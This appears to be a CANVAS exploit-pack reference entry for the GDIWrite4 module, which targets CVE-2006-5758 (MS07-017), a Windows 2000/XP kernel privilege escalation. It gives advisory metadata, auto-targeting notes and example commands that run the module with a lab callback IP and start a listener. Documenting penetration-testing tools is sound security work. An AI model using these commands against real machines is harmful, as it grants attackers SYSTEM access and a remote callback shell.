Name | GDIWrite4 |
CVE | CVE-2006-5758 |
Exploit Pack | CANVAS |
Description | GDIWrite4 (MS07-017) |
Notes | CVE Name: CVE-2006-5758
VENDOR: Microsoft
Notes: This exploit will auto-target based on reading a kernel file on Windows 2000 or XP. It will generate a target fingerprint when you run the auto-targeter - this is useful when you don't have read access to the kernel files and still want to run the exploit. It will leave a SYSTEM token as your current token, if it succeeds.
#example commandline usage on Windows 2000 SP4 English
#we set our callback IP to 10.10.10.6 in the test lab
runmodule GDIWrite4 -l 10.10.10.6 -d 5555
Make sure you have a listener listening already before you run the above command.
./commandlineInterface -v 1 -p 5555
If you get the wrong version (-v 1 on an XP box, say), you'll see a PAGE FAULT IN NON PAGED AREA bluescreen.
On XP this was fixed with KB925902
MSRC: http://www.microsoft.com/technet/security/Bulletin/ms07-017.mspx
MSADV: MS07-017
Date public: 11/06/2006
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5758
CVSS: 7.2 |